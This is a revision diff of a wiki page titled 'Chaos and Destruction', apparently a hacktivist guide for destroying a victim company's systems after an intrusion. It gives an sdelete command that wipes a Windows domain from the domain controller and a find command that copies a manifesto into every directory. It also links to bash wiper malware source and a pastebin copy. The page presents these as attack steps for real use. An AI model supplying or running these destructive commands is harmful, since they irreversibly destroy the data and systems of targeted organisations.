Chaos and Destruction: Difference between revisions
		
		
		
		Jump to navigation
		Jump to search
		
| m →Linux | m →Linux | ||
| Line 7: | Line 7: | ||
| Print your manifesto across a system | Print your manifesto across a system | ||
| * <code>find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;</code> | * <code>find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;</code> | ||
| Wipe a Linux system using a [https://0xjet.github.io/3OHA/2022/12/18/post.html  | Wipe a Linux system using a [https://0xjet.github.io/3OHA/2022/12/18/post.html bash wiper]. [https://github.com/0xjet/bash-malware/blob/main/AWFULSHRED/AWFULSHRED_beautified.zip Source] | ||
| * https://web.archive.org/web/20230724204753/https://pastebin.com/raw/1LcPihYr | * https://web.archive.org/web/20230724204753/https://pastebin.com/raw/1LcPihYr | ||
Revision as of 21:12, 24 July 2023
Companies have large networks consisting of both Windows and Linux systems, so if your end goal is not only leaking data to journalists but to also destroy your target then using a wiper will be the best way to achieve this goal, just make sure not to wipe critical services that may impact someones physical safety as demonstrated in Guacamaya's HackBack video, we want to destroy data, not harm human life.
Windows
- Guacamaya (2:13:35 Wiping windows domain with sdelete on the domain controller) sdelete64.exe -accepteula -r -s C:\*
Linux
Print your manifesto across a system
- find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;
Wipe a Linux system using a bash wiper. Source